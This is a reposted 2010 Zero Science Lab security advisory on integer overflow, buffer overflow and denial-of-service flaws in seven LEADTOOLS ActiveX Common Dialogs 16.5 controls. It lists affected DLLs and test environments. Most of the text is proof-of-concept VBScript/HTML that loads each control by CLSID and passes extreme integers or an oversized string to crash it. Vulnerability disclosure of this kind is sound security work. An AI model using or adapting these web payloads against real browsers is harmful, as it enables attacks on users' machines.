Leadtools ActiveX Common Dialogs 16.5 Multiple Remote Vulner
Posted on 01 September 2010
<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Leadtools ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================================================== Leadtools ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities ===================================================================== LEADTOOLS ActiveX Common Dialogs 16.5 Multiple Remote Vulnerabilities Vendor: LEAD Technologies, Inc. Product Web Page: http://www.leadtools.com Affected version: 16.5.0.2 Summary: With LEADTOOLS you can control any scanner, digital camera or capture card that has a TWAIN (32 and 64 bit) device driver. High-level acquisition support is included for ease of use while low-level functionality is provided for flexibility and control in even the most demanding scanning applications. Desc: LEADTOOLS ActiveX Common Dialogs suffers from multiple remote vulnerabilities (IoF, BoF, DoS) as it fails to sanitize the input in different objects included in the Common Dialogs class. Vulnerable Objects/OCX Dialogs (Win32): 1. ActiveX Common Dialogs (Web) --------------------> LtocxWebDlgu.dll 2. ActiveX Common Dialogs (Effects) ----------------> LtocxEfxDlgu.dll 3. ActiveX Common Dialogs (Image) ------------------> LtocxImgDlgu.dll 4. ActiveX Common Dialogs (Image Effects) ----------> LtocxImgEfxDlgu.dll 5. ActiveX Common Dialogs (Image Document)----------> LtocxImgDocDlgu.dll 6. ActiveX Common Dialogs (Color) ------------------> LtocxClrDlgu.dll 7. ActiveX Common Dialogs (File) -------------------> LtocxFileDlgu.dll - RegKey Safe for Script: True - RegKey Safe for Init: True Tested On: Microsoft Windows XP Professional SP3 (EN) Windows Internet Explorer 8.0.6001.18702 RFgen Mobile Development Studio 4.0.0.06 (Enterprise) Vulnerability discovered by Gjoko 'LiquidWorm' Krstic liquidworm gmail com Zero Science Lab - http://www.zeroscience.mk 24.08.2010 Zero Science Lab Advisory ID: ZSL-2010-4961 Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4961.php ############################################################## Proof of Concept: ############################################################## 1. (Web, LtocxWebDlgu.dll / LTRDWU.DLL): ------------------------------------------------------ <object classid='clsid:00165B53-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesRFGen40LtocxWebDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGWEBLib_U.LEADRasterDlgWeb_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 2. (Effects, LtocxEfxDlgu.dll / LTRDEU.DLL): ------------------------------------------------------ <object classid='clsid:00165B5B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesRFGen40LtocxEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGEFXLib_U.LEADRasterDlgEfx_U" argCount = 1 arg1=-1 target.Bitmap = arg1 </script> 3. (Image, LtocxImgDlgu.dll / LTRDMU.DLL): ------------------------------------------------------ <object classid='clsid:00165C7B-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesRFGen40LtocxImgDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGLib_U.LEADRasterDlgImg_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 4. (Image Effects, LtocxImgEfxDlgu.dll / LTRDXU.DLL): ------------------------------------------------------ <object classid='clsid:00165B57-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesRFGen40LtocxImgEfxDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGEFXLib_U.LEADRasterDlgImgEfx_U" argCount = 1 arg1=-2147483647 target.Bitmap = arg1 </script> 5. (Image Document, LtocxImgDocDlgu.dll / LTRDOU.DLL): ------------------------------------------------------ <object classid='clsid:00165B69-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesRFGen40LtocxImgDocDlgu.dll" prototype = "Property Let Bitmap As Long" memberName = "Bitmap" progid = "LTRASTERDLGIMGDOCLib_U.LEADRasterDlgImgDoc_U" argCount = 1 arg1=2147483647 target.Bitmap = arg1 </script> 6. (Color, LtocxClrDlgu.dll / LTRDRU.DLL): ------------------------------------------------------ <object classid='clsid:00165B4F-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesLEAD TechnologiesLEADTOOLS Active-X 16.5BinCDLLWin32LtocxClrDlgu.dll" prototype = "Property Let UserPalette ( ByVal iIndex As Integer ) As Long" memberName = "UserPalette" progid = "LTRASTERDLGCLRLib_U.LEADRasterDlgClr_U" argCount = 2 arg1=1 arg2=-2147483647 target.UserPalette(arg1 ) = arg2 </script> 7. (File, LtocxFileDlgu.dll / LTRDFU.DLL): ------------------------------------------------------ <object classid='clsid:00165C87-B1BA-11CE-ABC6-F5B2E79D9E3F' id='target' /> <script language='vbscript'> targetFile = "C:Program FilesRFGen40LtocxFileDlgu.dll" prototype = "Property Let DestinationPath As String" memberName = "DestinationPath" progid = "LTRASTERDLGFILELib_U.LEADRasterDlgFile_U" argCount = 1 arg1=String(9236, "A") target.DestinationPath = arg1 </script> # <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-09-01]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>
